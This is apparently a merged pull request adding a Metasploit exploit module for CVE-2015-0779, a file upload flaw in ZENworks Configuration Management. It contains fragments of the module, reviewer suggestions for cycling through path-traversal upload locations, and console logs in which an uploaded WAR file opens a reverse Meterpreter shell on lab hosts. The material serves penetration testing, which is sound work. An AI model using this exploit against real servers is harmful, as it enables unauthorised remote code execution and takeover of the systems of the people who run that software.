### PR TITLE
Create exploit for CVE-2015-0779

### PR DESCRIPTION
**Pull request by pedrib**
This is an exploit for CVE-2015-0779, a file upload vulnerability in ZenWorks Configuration Management up to and including 11.3.1. 
This exploit works in Windows, Linux and the Virtual Appliance which can be downloaded from Novell's website. It has been extensively tested on all platforms.

I'll add the full disclosure and OSVDB links once they become available, but otherwise it is ready to go on my side.

### CODE REVIEW

**Comment by pedrib** [comment]
Added OSVDB and full disc URL, good to go!

**Comment by pedrib** [comment]
Bump? Do you need anything else, please let me know!

File: modules/exploits/multi/http/zcm_file_upload.rb [hunk 1]
```diff
@@ -0,0 +1,127 @@
...
+    print_status("#{peer} - Executing payload, wait for session...")
+    send_request_cgi({
+      'uri'    => normalize_uri(app_base, Rex::Text.rand_text_alpha(rand(8)+8)),
+      'method' => 'GET'
+    })
+    return true
+  end
+
+
+  def exploit
```
Comment (jvazquez-r7) [inline modules/exploits/multi/http/zcm_file_upload.rb]: I feel like it should be something like:

```ruby
tomcat_paths = []
if datastore['TOMCAT_PATH'] 
  tomcat_paths << datastore['TOMCAT_PATH']
end
tomcat_paths.concat([ '../../../opt/novell/zenworks/share/tomcat/webapps/', '../webapps/' ])

tomcat_paths.each do |tomcat_path|
  upload_war_and_exec(tomcat_path)
  break if session_created?
end
```

File: modules/exploits/multi/http/zcm_file_upload.rb [hunk 2]
```diff
@@ -0,0 +1,127 @@
...
+      'DisclosureDate' => 'Apr 7 2015'))
+
+    register_options(
+      [
+        Opt::RPORT(443),
+        OptBool.new('SSL',
+          [ true, "Use SSL", true ]),
+        OptString.new('TARGETURI',
+          [ true, "The base path to ZCM / ZENworks Suite", '/zenworks/' ]),
+        OptString.new('TOMCAT_PATH',
```
Comment (jvazquez-r7) [inline modules/exploits/multi/http/zcm_file_upload.rb]: If the ```TOMCAT_PATH``` isn't required, you can avoid initialization by deleting the last ```''``` default value

**Comment by jvazquez-r7** [comment]
Testing, if works I can make cleanup by myself, looks like minor things :)

**Comment by jvazquez-r7** [comment]
Module works:

```
msf exploit(zcm_file_upload) > exploit

[*] Started reverse handler on 172.16.158.1:4444
[*] 172.16.158.132:443 - Uploading WAR file to ../../../opt/novell/zenworks/share/tomcat/webapps/
[-] 172.16.158.132:443 - Failed to upload, try again with a different path?
[*] 172.16.158.132:443 - Uploading WAR file to ../webapps/
[*] 172.16.158.132:443 - Upload appears to have been successful, waiting 15 seconds for deployment
[*] 172.16.158.132:443 - Executing payload, wait for session...
[*] Sending stage (30680 bytes) to 172.16.158.132
[*] Meterpreter session 1 opened (172.16.158.1:4444 -> 172.16.158.132:1119) at 2015-05-01 13:00:35 -0500

meterpreter > getuid
sServer username: __z_158_132__
ymeterpreter > syssinfo
[-] Unknown command: syssinfo.
meterpreter > sysinfo
Computer    : juan-6ed9db6ca8
OS          : Windows 2003 5.2 (x86)
Meterpreter : java/java
meterpreter >
```

I tested it against a ZCM 10.2 ISO I had in the archives. I'll do some final cleanup by myself and land in a while! Thanks!

**Comment by jvazquez-r7** [comment]
Landed finally! Had some problems with my ZCM installation, had to reinstall!

Final commit: https://github.com/rapid7/metasploit-framework/commit/a531ad9ec27f19ffe3c829c6f1b253905aed68e4

Final test:
```
msf exploit(zenworks_configuration_management_upload) > rexploit
[*] Reloading module...

[*] Started reverse handler on 172.16.158.1:4444
[*] 172.16.158.133:443 - Uploading WAR file to ../../../opt/novell/zenworks/share/tomcat/webapps/
[-] 172.16.158.133:443 - Failed to upload, try again with a different path?
[*] 172.16.158.133:443 - Uploading WAR file to ../webapps/
[*] 172.16.158.133:443 - Upload appears to have been successful
[*] 172.16.158.133:443 - Attempting to launch payload in deployed WAR...
[*] 172.16.158.133:443 - Attempting to launch payload in deployed WAR...
[*] 172.16.158.133:443 - Attempting to launch payload in deployed WAR...
[*] Sending stage (30680 bytes) to 172.16.158.133
[*] 172.16.158.133:443 - Attempting to launch payload in deployed WAR...

meterpreter > getuid
sServer username: __z_158_133__
meterpreter > sysinfo
Computer    : juan-6ed9db6ca8
OS          : Windows 2003 5.2 (x86)
Meterpreter : java/java
meterpreter > exit -y
```

Thanks @pedrib !

**Pull request merged**